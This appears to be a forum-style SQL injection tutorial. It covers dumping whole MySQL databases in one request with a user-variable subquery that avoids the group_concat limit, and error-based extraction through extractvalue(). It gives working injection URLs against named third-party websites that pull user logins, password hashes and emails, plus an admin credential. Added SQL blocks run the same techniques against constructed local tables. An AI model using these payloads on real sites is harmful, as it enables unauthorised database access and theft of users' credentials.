
Enumeration in minimal requests [DUMP DB in 1 request]

What we will be doing is using nested select statements (subqueries), along with our own user variable, to bypass the 1024-character limit of group_concat (the group_concat_max_len setting; MySQL silently cuts the result there and only raises a warning). If you're new to SQL this might look a bit advanced; just study the code. Using this, you can get all the info you need in 2 requests.

First, the databases/tables/columns. The trick works because the WHERE clause is evaluated once per row: the right-hand side of IN reassigns @ to the growing string, the comparison against the old value never matches, so the subquery returns nothing, but @ has been appended to on every row it visited. The table_schema>=@ condition does no filtering (every schema name sorts above the NUL byte @ starts with), and the trailing alias (x here, a in the PoC) is required because MySQL insists on naming derived tables.

Code:
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))x)

PoC:
Code:
http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+

Of course, if magic_quotes is enabled you would need to avoid the quoted strings by using hex values or the char() function. The only ceiling on @ is max_allowed_packet, not group_concat_max_len, so it holds far more than 1024 bytes. View the source, and we see every single database/table/column accessible:

Now, to grab information from the columns. Same pattern, but the walk is over the target table and the concat lists the columns you want, separated by 0x3a (a colon). The seed must assign the same variable the rest of the query appends to, otherwise the walk starts from NULL and concat returns NULL on every row.

Code:
(select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)

PoC
Code:
http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+
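The two queries above run end to end against a local MySQL instance, with a GROUP_CONCAT of the same rows alongside to show the truncation they avoid. This is an added example, not code from the original tutorial; the schema demo, the table demo.users, its 100 rows and the column names are all constructed here.

```sql
-- Added example (not from the original tutorial). Assumed names: schema demo,
-- table demo.users; every row is constructed below.
CREATE DATABASE IF NOT EXISTS demo;
USE demo;
DROP TABLE IF EXISTS users;
CREATE TABLE users (
  id         INT PRIMARY KEY AUTO_INCREMENT,
  user_login VARCHAR(60)  NOT NULL,
  user_pass  VARCHAR(255) NOT NULL,
  user_email VARCHAR(100) NOT NULL
);

-- 100 constructed rows of roughly 60 bytes each, so a full dump is well past 1024 bytes.
INSERT INTO users (user_login, user_pass, user_email)
SELECT CONCAT('user', n), MD5(n), CONCAT('user', n, '@example.com')
FROM (SELECT a.i + 10 * b.i AS n
      FROM (SELECT 0 i UNION ALL SELECT 1 UNION ALL SELECT 2 UNION ALL SELECT 3 UNION ALL SELECT 4
            UNION ALL SELECT 5 UNION ALL SELECT 6 UNION ALL SELECT 7 UNION ALL SELECT 8 UNION ALL SELECT 9) a,
           (SELECT 0 i UNION ALL SELECT 1 UNION ALL SELECT 2 UNION ALL SELECT 3 UNION ALL SELECT 4
            UNION ALL SELECT 5 UNION ALL SELECT 6 UNION ALL SELECT 7 UNION ALL SELECT 8 UNION ALL SELECT 9) b) t;

-- 1) GROUP_CONCAT is cut at group_concat_max_len (1024 bytes by default). LENGTH()
--    comes back as 1024 and the only sign of the loss is warning 1260.
SELECT @@group_concat_max_len;
SELECT LENGTH(GROUP_CONCAT(CONCAT_WS(':', id, user_login, user_pass, user_email) SEPARATOR '\n'))
FROM users;
SHOW WARNINGS;

-- 2) The user-variable walk from the tutorial. The scalar subquery visits every row;
--    on each one the right-hand side of IN reassigns @ to the growing string, the
--    comparison with the old value is false, so the subquery yields NULL while @
--    keeps everything it saw. The only ceiling is max_allowed_packet.
SELECT LENGTH(@) AS dump_len, @ AS dump
FROM (
  SELECT (@:=0x00) AS seed,
         (SELECT (@) FROM users
           WHERE (@) IN (@:=CONCAT(@, 0x0a, id, 0x3a, user_login, 0x3a, user_pass, 0x3a, user_email))) AS walk
) x;

-- 3) The same walk over information_schema, restricted to one schema so the output
--    stays readable; drop the table_schema filter to map every database you can see.
SELECT @ AS layout
FROM (
  SELECT (@:=0x00) AS seed,
         (SELECT (@) FROM information_schema.columns
           WHERE table_schema = 'demo'
             AND (@) IN (@:=CONCAT(@, 0x0a, ' [ ', table_schema, ' ] > ', table_name, ' > ', column_name))) AS walk
) x;
```

Feed it to the mysql client as a script; dump_len comes out in the thousands against the 1024 from GROUP_CONCAT. Two caveats: MySQL 8.0.13 and later warn that assigning a user variable inside an expression is deprecated, and the walk relies on an evaluation order the server does not promise, so compare the number of 0x0a separators in the dump with COUNT(*) before trusting it.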

xPath Injection

If you're trying to hack a site, you have found an SQLi vuln, but union based payloads (order by) and boolean based ones (1=1) get you nothing, chances are you can use xPath injection. The name is a misnomer that stuck: this is error-based SQL injection. MySQL's extractvalue() XML function raises an "XPATH syntax error" that quotes part of its second argument, and if the application prints database errors, the quoted part is your data. It needs MySQL 5.1.5 or later, where extractvalue() was introduced (it is not limited to 5.1; later versions behave the same), and a page that displays the MySQL error text.

We will be using extractvalue() to get the data we need (updatexml() raises the same error and can be swapped in).

First of all, we need a vulnerable site. Code: http://www.ianforsythphotographer.com/main.php?id=1' This is vulnerable to union based injection, yes, but for the purposes of this tutorial I will use xPath injection.

To gather data we will be using extractvalue(rand(),concat(0x0a,data)). The first argument does not matter; the second is parsed as XPath, and a leading 0x0a (newline) is not a valid start for an XPath expression, so the parser fails on the first character and the error message quotes the string from there on, data included. So,

Code:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,version()))--+

"Query failed: XPATH syntax error: ' 5.1.39-log'"

(the newline shows up as a space in the browser). One caveat: the quoted part of the error is capped at 32 characters, newline included, so anything longer has to be fetched in slices with substring().

Now to get the table names, we will use

Code:
and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+

The subquery must return a single row, so use LIMIT n,1 to step through the tables (0,1 is the first, 1,1 the second, and so on; once the result is empty, concat gives NULL and the error stops, which is how you know you are past the last one). So

Code:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=0x69665f696d61676573 limit 3,1)))--+

"Query failed: XPATH syntax error: '::plogger_config'"

Here 0x69665f696d61676573 is just the database name if_images written in hex, so no quotes are needed.

Now to get the columns of that table, we will use basically the same, except information_schema.columns and column_name, and again use LIMIT to step through the columns. MySQL accepts the double-quoted string unless ANSI_QUOTES is set; use hex if quotes are a problem. Adding table_schema=database() to the WHERE is also a good idea, otherwise a table with the same name in another database can answer first.

Code:
and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="TABLE NAME" limit 0,1)))

So,

Code:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 3,1)))--+

"Query failed: XPATH syntax error: '::admin_username'"

and:

Code:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 4,1)))--+

"Query failed: XPATH syntax error: '::admin_password'"

Now that we have the columns, we will need to get the data from them. We will use

Code:
extractvalue(rand(),concat(0x0a,(select concat(COLUMNS) from TABLE limit 0,1)))

The LIMIT is needed here too: without it the subquery returns one row per record and MySQL refuses it with "Subquery returns more than 1 row". So,

Code:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(admin_username,0x3a,admin_password) from if_images.plogger_config LIMIT 0,1)))--+

"Query failed: XPATH syntax error: 'admin:392592ed88f501ea498f14343'"

Count that output: the newline, admin: and 25 hex characters make exactly 32, so the error message cap has cut the password hash short. To get the rest, wrap the concat in substring() with a higher start offset (substring(...,32,31) for the next slice) and repeat the request.
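The whole error-based chain from version to data, run against a constructed table, including the 32-character cap and how to page past it. This is an added example, not code from the tutorial; the schema demo, the table demo.plogger_config and its single row are made up here, and every EXTRACTVALUE statement fails on purpose, which is the point.

```sql
-- Added example (not from the original tutorial). Assumed names: schema demo,
-- table demo.plogger_config; the row is constructed and the hash is a fixed string.
CREATE DATABASE IF NOT EXISTS demo;
USE demo;
DROP TABLE IF EXISTS plogger_config;
CREATE TABLE plogger_config (
  admin_username VARCHAR(60) NOT NULL,
  admin_password VARCHAR(64) NOT NULL
);
INSERT INTO plogger_config VALUES ('admin', '0123456789abcdef0123456789abcdef');

-- Every statement from here on fails on purpose. The XPath parser does not accept a
-- leading newline (0x0a), stops at character 1 and echoes the rest in the error:
--   ERROR 1105 (HY000): XPATH syntax error: '<newline><data>'
-- The echoed part is capped at 32 characters, newline included.

-- 1) Server version.
SELECT EXTRACTVALUE(RAND(), CONCAT(0x0a, VERSION()));

-- 2) Tables of the current schema, one per request via LIMIT n,1. Only plogger_config
--    exists in demo here, so offset 0 returns it; offset 1 makes CONCAT return NULL,
--    which produces no error at all, and that silence marks the end of the list.
SELECT EXTRACTVALUE(RAND(), CONCAT(0x0a, (SELECT table_name FROM information_schema.tables
                                          WHERE table_schema = DATABASE()
                                          ORDER BY table_name LIMIT 0,1)));

-- 3) Columns of that table. Filtering on table_schema too stops a same-named table in
--    another database from answering; ORDER BY ordinal_position keeps the offsets
--    stable. Offset 0 is admin_username, offset 1 is admin_password.
SELECT EXTRACTVALUE(RAND(), CONCAT(0x0a, (SELECT column_name FROM information_schema.columns
                                          WHERE table_schema = DATABASE()
                                            AND table_name = 'plogger_config'
                                          ORDER BY ordinal_position LIMIT 1,1)));

-- 4) The data, as the tutorial does it. 'admin:' plus a 32-character hash is 38
--    characters; with the newline only the first 32 survive, so the last 7 hash
--    characters are lost. Echoed: 'admin:0123456789abcdef012345678'
SELECT EXTRACTVALUE(RAND(), CONCAT(0x0a, (SELECT CONCAT(admin_username, 0x3a, admin_password)
                                          FROM plogger_config LIMIT 0,1)));

-- 5) Paging: 31 characters per request leaves room for the newline.
--    Slice 1 (chars 1-31):  'admin:0123456789abcdef012345678'
--    Slice 2 (chars 32-62): '9abcdef'
SELECT EXTRACTVALUE(RAND(), CONCAT(0x0a, (SELECT SUBSTRING(CONCAT(admin_username, 0x3a, admin_password), 1, 31)
                                          FROM plogger_config LIMIT 0,1)));
SELECT EXTRACTVALUE(RAND(), CONCAT(0x0a, (SELECT SUBSTRING(CONCAT(admin_username, 0x3a, admin_password), 32, 31)
                                          FROM plogger_config LIMIT 0,1)));
```

Run it with mysql --force (or paste statement by statement) so the client keeps going after each deliberate error. In the injected form these expressions sit after the "and" in the URLs above; the LIMIT offset and the SUBSTRING start are the two numbers a script loops over.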
